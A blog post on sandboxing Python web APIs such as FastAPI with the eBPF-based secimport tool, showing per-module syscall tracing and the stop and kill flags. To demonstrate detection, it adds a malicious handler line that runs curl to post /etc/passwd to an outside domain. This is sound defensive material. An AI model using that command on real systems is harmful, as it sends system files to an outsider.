Secure FastAPI with eBPF

Published in

InfoSec Write-ups

8 min read · Sep 3, 2023

Leverage eBPF to secure internet-facing APIs: FastAPI, BlackSheep, Flask, Django, aiohttp, Tornado, and more.

In the previous post, I used secimport to secure PyTorch code.
I showed how PyTorch models from insecure sources can be evaluated safely on any Linux machine.

Why Secure APIs?

FastAPI has ~240K lines of code.
➜ fastapi git:(master) git ls-files | xargs wc -l
240562 total

In most cases, APIs should operate independently of the OS and avoid relying on OS memory or the file system. They are designed to be stateless and simple. They combine the application interface with database operations, and they communicate constantly, at scale.

For attackers, APIs are valuable targets: they are permissive, all-in-one entry points, and compromising one has significant impact. Yet their primary role is narrow: handle requests and return status codes (indicating success or error) over a TCP-based application protocol.

Vulnerabilities in Dependencies

In December 2021, Log4Shell (CVE-2021-44228) exposed a critical issue. Log4j, a library designed for logging, performed JNDI lookups on the strings it logged, so attacker-controlled input such as an HTTP header was enough to exploit many internet-facing Java servers. The lookup made the target connect to an attacker-controlled LDAP server, then load and execute the attacker's code. It raises the question: why should a logging library be able to use the network and execute commands on the host? Such functionality should be enabled explicitly, not by default.

The Ease of Malicious Packages in PyPI

In May 2023, pypi.org (the Python Package Index) had to temporarily suspend new user and new project registrations, because the volume of malicious users and projects outpaced the administrators' ability to respond. We select our dependencies carefully, yet we should not have to hesitate before using them. Dependencies should not be able to use the network or run processes without explicit permission. Python packages can execute arbitrary code during installation, at import time, and at runtime.
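
To make the import-time case concrete, here is a minimal sketch. The module name innocent_pkg and the marker file are made up for illustration, and the "payload" is a harmless file write. The point is only that top-level module code runs as soon as the module is imported, before any of its functions are called.

```python
import importlib
import sys
import tempfile
from pathlib import Path


def demo_import_side_effect() -> bool:
    """Import a throwaway module and report whether its top-level code ran."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = Path(tmp) / "marker.txt"
        # Hypothetical package: its top-level code runs as soon as it is imported.
        source = (
            "from pathlib import Path\n"
            f"Path({str(marker)!r}).write_text('ran at import time')\n"
        )
        (Path(tmp) / "innocent_pkg.py").write_text(source)

        sys.path.insert(0, tmp)
        try:
            importlib.invalidate_caches()
            importlib.import_module("innocent_pkg")  # no function is ever called
            return marker.exists()
        finally:
            # Clean up so the demo leaves the interpreter as it found it.
            sys.path.remove(tmp)
            sys.modules.pop("innocent_pkg", None)


if __name__ == "__main__":
    print("side effect happened on import:", demo_import_side_effect())
```

A real malicious package would replace the file write with a network call or a spawned process, which is exactly the kind of syscall a per-module policy can flag.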

The Dominance of the Interpreter (“Interpreter is king”)

Python’s lack of robust permission management is a concern. Controlling what each module in your code can do is hard, because all modules share the same interpreter state (for example sys.modules), the same memory, and the same threads.
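
A small sketch of why shared interpreter state makes per-module control hard: any imported code can reach any other module through sys.modules and replace its functions. The leaky_dumps wrapper below is a made-up stand-in for a hostile dependency; it only tags the output instead of leaking it.

```python
import json
import sys


def patch_json_from_elsewhere():
    """Simulate a third-party module tampering with json via sys.modules."""
    original = json.dumps
    shared = sys.modules["json"]  # the very same object every importer sees

    def leaky_dumps(obj, *args, **kwargs):
        # A hostile dependency could exfiltrate `obj` here; we only tag the output.
        return original(obj, *args, **kwargs) + " /* intercepted */"

    shared.dumps = leaky_dumps
    return original


if __name__ == "__main__":
    original = patch_json_from_elsewhere()
    try:
        # Our own code never imported anything suspicious, yet it calls the patched function.
        print(json.dumps({"token": "secret"}))
    finally:
        json.dumps = original  # restore the real implementation
```

Nothing in the interpreter stops this, which is why the enforcement in this post happens outside the interpreter, at the syscall level.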

Some may disagree, but I believe that well-defined capabilities make programs more predictable.

Tracing Python syscalls in real-time

In the first blog post (Part 1), I explored various tracing tools.
I had already used DTrace for runtime tracing on Mac and Windows, but I wanted an even better solution. That solution is Linux-only and uses eBPF.

I incorporated bpftrace, an eBPF+LLVM-based toolkit, into secimport. bpftrace was the best fit thanks to its gentle learning curve and robustness.
What makes bpftrace truly remarkable is that it uses LLVM to compile high-level, user-defined scripts written in the bpftrace language into efficient BPF code. The results are impressive!

Secimport

Secimport, powered by eBPF, addresses these concerns by providing a secure sandbox for Python. With secimport, specific system calls can be specified per module in your code, to protect your environment at runtime at very little cost.

Using USDT and kernel probes, secimport traces and secures the Python runtime. It gives developers back control over what their packages do and helps them safeguard their code.

Let’s install secimport on our host (Linux in this case):

$ pip install secimport

The available secimport commands include:

secimport trace: Trace the behavior of a Python program, by running it or by specifying a running process id. The syscalls are logged per module into a file.
secimport trace_pid: Trace a running process by PID.
secimport build: Build a new sandbox environment from a trace.
secimport run: Run a Python process inside a sandbox environment.
secimport interactive: Create a new tailor-made sandbox by recording the behavior of an interactive Python interpreter. Great for small snippets and evaluation. It runs secimport trace, secimport build, and secimport run sequentially.

Creating a new secimport sandbox from scratch:

To create a new sandbox environment from scratch, you can use the docker container:

git clone https://github.com/avilum/secimport.git
cd secimport/docker
./build.sh # Builds the bpftrace Docker image to match your existing kernel (Mac is supported as well).
./run.sh   # Starts a new temporary container.

You can start building your sandbox by using secimport interactive:

root@1fa3d6f09989:/workspace# secimport interactive
- A python shell will be opened
- The behavior will be recorded.
OK? (y): y

TRACING: ['/workspace/secimport/profiles/trace.bt', '-c', '/workspace/Python-3.10.0/python', '-o', 'trace.log']
                        Press CTRL+D to stop the trace;
Python 3.10.0 (default, Mar 19 2023, 08:34:46) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import this
>>> exit()


$ secimport build
eBPF SANDBOX:  sandbox.bt


$ secimport run
Python 3.10.0 (default, Mar 19 2023, 08:34:46) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import this
>>> import os
[SECIMPORT VIOLATION]: <stdin> called syscall ioctl at depth 0
[SECIMPORT VIOLATION]: <stdin> called syscall ioctl at depth 0

The STOP and KILL flags

Execution Prevention with --stop_on_violation and --kill_on_violation

If you know what you are doing and have defined a good enough policy,
I encourage you to use these two very useful flags:

root@1bc0531d91d0:/workspace# secimport run  --stop_on_violation
>>> import os
>>> os.system('ps')
[SECURITY PROFILE VIOLATED]: <stdin> called syscall 56 at depth 8022
^^^ STOPPING PROCESS 85918 DUE TO SYSCALL VIOLATION ^^^
PROCESS 85918 STOPPED.

root@ee4bc99bb011:/workspace# secimport run --kill_on_violation
>>> import os
>>> os.system('ps')
[SECURITY PROFILE VIOLATED]: <stdin> called syscall 56 at depth 8022
^^^ KILLING PROCESS 86466 DUE TO SYSCALL VIOLATION ^^^
 KILLED.
 SANDBOX EXITED;
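
If you collect these violation lines during a logging-only period, a few lines of Python can summarize them. This is a minimal sketch: the regular expression is inferred only from the two log formats printed in this post, not from a documented secimport format, so adjust it if your version prints something different.

```python
import re
from collections import Counter
from typing import NamedTuple, Optional

# Pattern inferred from the log lines shown in this post (an assumption, not a spec).
VIOLATION_RE = re.compile(
    r"^\[(?:SECIMPORT VIOLATION|SECURITY PROFILE VIOLATED)\]: "
    r"(?P<module>.+?) called syscall (?P<syscall>\S+) at depth (?P<depth>\d+)\s*$"
)


class Violation(NamedTuple):
    module: str   # e.g. "<stdin>" or "/workspace/main.py"
    syscall: str  # a name ("ioctl") or a number ("56"), exactly as printed
    depth: int


def parse_violation(line: str) -> Optional[Violation]:
    """Return a Violation for a matching log line, or None for any other line."""
    m = VIOLATION_RE.match(line.strip())
    if m is None:
        return None
    return Violation(m["module"], m["syscall"], int(m["depth"]))


def summarize(lines) -> Counter:
    """Count violations per (module, syscall) pair, ignoring unrelated lines."""
    return Counter((v.module, v.syscall) for v in map(parse_violation, lines) if v)
```

Feeding the sandbox output through summarize() shows which module and syscall pairs are still missing from the policy before you switch to stopping or killing the process.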

How to Protect APIs from Remote Code Execution?

Let’s try to secure some code against such scenarios.
I will use a FastAPI program as a quick example (from their quickstart).

from fastapi import FastAPI
import uvicorn


app = FastAPI()

@app.get("/")
async def root():
    return {"message": "Hello World"}

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)

Step 1: Trace your application.

You can use one of the following methods to trace your Python application:

secimport trace will run your application with an eBPF tracing script for syscalls.

secimport trace main.py

secimport trace_pid will trace a running process that started beforehand.

secimport trace_pid 28 
# where 28 is an already-running python process

secimport interactive can trace an interactive shell, for small to medium code snippets (instead of an entrypoint like main.py).

root@0584e98a4b5c:/workspace# secimport interactive

Lets create our first tailor-made sandbox with secimport!
- A python shell will be opened
- The behavior will be recorded.
OK? (y): y
...

High test coverage helps: we can run the test suite under the tracer, and if the tests cover your logic, we can expect the same syscalls in production.

You can also log the behavior in production safely using eBPF,
with ‘secimport trace_pid 123’. It attaches to a running process and records all syscalls, per module in the code.
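
A trace only contains the code paths that actually ran, so it helps to drive every endpoint while the tracer is attached. Below is a minimal sketch of such a driver using only the standard library. The function names are mine, and the paths you pass in are whatever your application serves.

```python
import urllib.error
import urllib.request


def http_status(url: str, timeout: float = 5.0) -> int:
    """Fetch a URL and return its HTTP status code, including error statuses."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        # Error responses are useful too: they exercise the error-handling code paths.
        return err.code


def exercise(base_url: str, paths, fetch=http_status) -> dict:
    """Request every path once and return {path: status}."""
    return {path: fetch(base_url.rstrip("/") + path) for path in paths}
```

For the example app in this post, calling exercise("http://127.0.0.1:8000", ["/", "/does-not-exist"]) while the trace is running would record both the success path and the 404 path.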

So we have traced our program. Let’s build the sandbox from this trace!

Step 2: Create a YAML/JSON policy from the trace.

We build a bpftrace script from the trace, which is then compiled to eBPF code for the supervisor process.

secimport build <flags>

Step 3: Run your Python application inside the eBPF sandbox.

secimport run --entrypoint main.py <flags>
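
The three steps can be scripted. The sketch below only assembles the command lines that appear in this post (secimport trace, secimport build, and secimport run with --entrypoint and the two violation flags). I have not verified them against every secimport version, so check secimport --help first. The helper names and the dry_run switch are my own.

```python
import shlex
import subprocess


def sandbox_pipeline(entrypoint: str, on_violation: str = "log"):
    """Return the three CLI invocations used in this post, as argv lists."""
    run_cmd = ["secimport", "run", "--entrypoint", entrypoint]
    if on_violation == "stop":
        run_cmd.append("--stop_on_violation")
    elif on_violation == "kill":
        run_cmd.append("--kill_on_violation")
    elif on_violation != "log":
        raise ValueError(f"unknown on_violation mode: {on_violation!r}")
    return [
        ["secimport", "trace", entrypoint],  # step 1: record syscalls per module
        ["secimport", "build"],              # step 2: turn the trace into a sandbox
        run_cmd,                             # step 3: run inside the sandbox
    ]


def run_pipeline(entrypoint: str, on_violation: str = "log", dry_run: bool = True):
    """Print each command; execute it only when dry_run is False."""
    for argv in sandbox_pipeline(entrypoint, on_violation):
        print("$", shlex.join(argv))
        if not dry_run:
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    run_pipeline("main.py", on_violation="log")  # dry run: prints the commands only
```

Keep in mind that the trace step runs until you stop it, so a real run is interactive. The default "log" mode matches the grace period recommended later in this post.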

Handle Violations

So we ran main.py with secimport and it works well.
Let’s see what happens if we add the following malicious line:

@app.get("/")
async def root():
+++ import os; os.system('curl -X POST -d "$(cat /etc/passwd)" mydomain.com')
    return {"message": "Hello World"}

By default, secimport will log a violation, because we run a command using “os.system”.

If we want to stop or kill the application when a violation is detected, secimport can send a signal to the supervised subprocess, SIGSTOP or SIGKILL, just before the syscall is actually executed!

secimport is capable of interfering with the process and blocking it when it violates the policy you define.
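
To see what the two signals do to a process, independent of how secimport delivers them, here is a small POSIX-only sketch. It spawns a sleeping child, stops it, resumes it, and then kills it. This is plain Python signal handling, not secimport code.

```python
import os
import signal
import subprocess
import sys


def stop_then_kill():
    """Show the difference between SIGSTOP and SIGKILL on a child process."""
    child = subprocess.Popen([sys.executable, "-c", "import time; time.sleep(60)"])

    os.kill(child.pid, signal.SIGSTOP)
    # WUNTRACED makes waitpid return when the child is stopped, not only when it exits.
    _, status = os.waitpid(child.pid, os.WUNTRACED)
    was_stopped = os.WIFSTOPPED(status)

    os.kill(child.pid, signal.SIGCONT)  # a stopped process can be resumed...
    os.kill(child.pid, signal.SIGKILL)  # ...a killed one cannot
    child.wait()
    # Popen reports death by signal as a negative return code.
    return was_stopped, child.returncode


if __name__ == "__main__":
    print(stop_then_kill())
```

A stopped process stays frozen in memory, so you can inspect it or resume it with SIGCONT, while a killed process is gone for good. That difference is the trade-off between the two flags.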

Stop the process upon violation

root@0584e98a4b5c:/workspace# secimport run --entrypoint main.py --stop_on_violation
[WARNING]: This sandbox will send SIGSTOP to the program upon violation.

INFO:     Started server process [93]
INFO:     Waiting for application startup.
INFO:     Application startup complete.
INFO:     Uvicorn running on http://0.0.0.0:8000 (Press CTRL+C to quit)

[SECURITY PROFILE VIOLATED]: /workspace/main.py called syscall 56 at depth 174387
^^^ STOPPING PROCESS 2446 DUE TO SYSCALL VIOLATION ^^^
  PROCESS 2446 STOPPED.

As you can see in the logs, adding the “--stop_on_violation” flag to “secimport run” made the sandbox stop the process, and it did not send the HTTP response at all.

The page did not load: the response was empty. That’s what we expected, because the policy was violated.

Kill the process upon violation

What if we want to kill the process, instead of stopping it?

root@0584e98a4b5c:/workspace# secimport run --entrypoint main.py --kill_on_violation

[WARNING]: This sandbox will send SIGKILL to the program upon violation.

INFO:     Started server process [100]
INFO:     Waiting for application startup.
INFO:     Application startup complete.
INFO:     Uvicorn running on http://0.0.0.0:8000 (Press CTRL+C to quit)
[SECURITY PROFILE VIOLATED]: /workspace/main.py called syscall 56 at depth 173398
^^^ KILLING PROCESS 2455 DUE TO SYSCALL VIOLATION ^^^
  KILLED.
 SANDBOX EXITED;

The process was killed, as expected. That’s amazing in my opinion!

How to deal with errors?
I recommend having a grace period in which all the “errors” are logged instead of actively blocked. Logging is the default behavior.
Once you know what you are doing and have covered all the use cases you would like to allow, use the (unsafe) --stop_on_violation or --kill_on_violation flags to block attacks rather than just logging them.

Conclusion

Imagine having a public “capabilities.txt” file in every Python repository, defining the syscalls each module can execute.
The current interpreter does not support that, of course, but such a precise specification would clarify a module’s behavior, leaving no room for ambiguity.

Programmers should have a clear understanding of their code’s actions, including network communication, file system access, sudo privileges, socket binding, process management (fork/spawn), memory operations (mmap, unshare, shm), and more.
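
As a thought experiment, here is what checking against such a file could look like. Everything in this sketch is hypothetical: the file format, the module names, and the helper functions are invented for illustration, and nothing like it exists in Python or in secimport today.

```python
from typing import Dict, Iterable, List, Set, Tuple

# Hypothetical file format, invented for this sketch: "<module>: <syscall>, <syscall>, ..."
EXAMPLE_CAPABILITIES = """\
# capabilities.txt (hypothetical)
logging: write, openat, close
http_client: socket, connect, sendto, recvfrom
"""


def parse_capabilities(text: str) -> Dict[str, Set[str]]:
    """Parse the hypothetical format into {module: set of allowed syscalls}."""
    allowed: Dict[str, Set[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        module, _, syscalls = line.partition(":")
        allowed[module.strip()] = {s.strip() for s in syscalls.split(",") if s.strip()}
    return allowed


def find_violations(
    allowed: Dict[str, Set[str]], observed: Iterable[Tuple[str, str]]
) -> List[Tuple[str, str]]:
    """Return the observed (module, syscall) pairs that the file does not allow."""
    # Modules without an entry are allowed nothing (deny by default).
    return [(m, s) for m, s in observed if s not in allowed.get(m, set())]
```

With a file like this, a logging module that suddenly calls connect shows up immediately as a violation, which is exactly the question Log4Shell raised.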

Thank you for reading this far.
I hope I encouraged you to secure your current applications with secimport. I can help with that process, just open an issue on GitHub.

Part 1: Sandboxing Python modules in your code
Part 2: Secure PyTorch Models with eBPF
Source Code and Examples: https://github.com/avilum/secimport

By the way, I am doing this in my spare time. I also really love coffee!

Avi is making the internet safer in his spare time

I’m a business-oriented engineer, who loves security and AI, with deep security insights. I like to pwn cloud…

www.buymeacoffee.com

Check out my previous releases:

Securing PyTorch Models with eBPF

This article was not generated by GPT

infosecwriteups.com

How I Discovered Thousands of Open Databases on AWS

My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto…

infosecwriteups.com

POC For Google Phishing In 10 Minutes: ɢoogletranslate.com

Back in 2016, I ran into a post about someone buying ɢoogle.com. It was used for phishing proposes (notice the first…

infosecwriteups.com

Identify Website Users By Client Port Scanning — Using WebAssembly And Go

Websites tend to scan the open ports of their users, from the browser, to identify new/returning users better. Can…

infosecwriteups.com

Facebook Knows What You Eat: Discover The Entire Data Facebook Collects About You, Step By Step.

A story of how I explored https://facebook.com/dyi programmatically.

medium.com

Written by Avi Lumelsky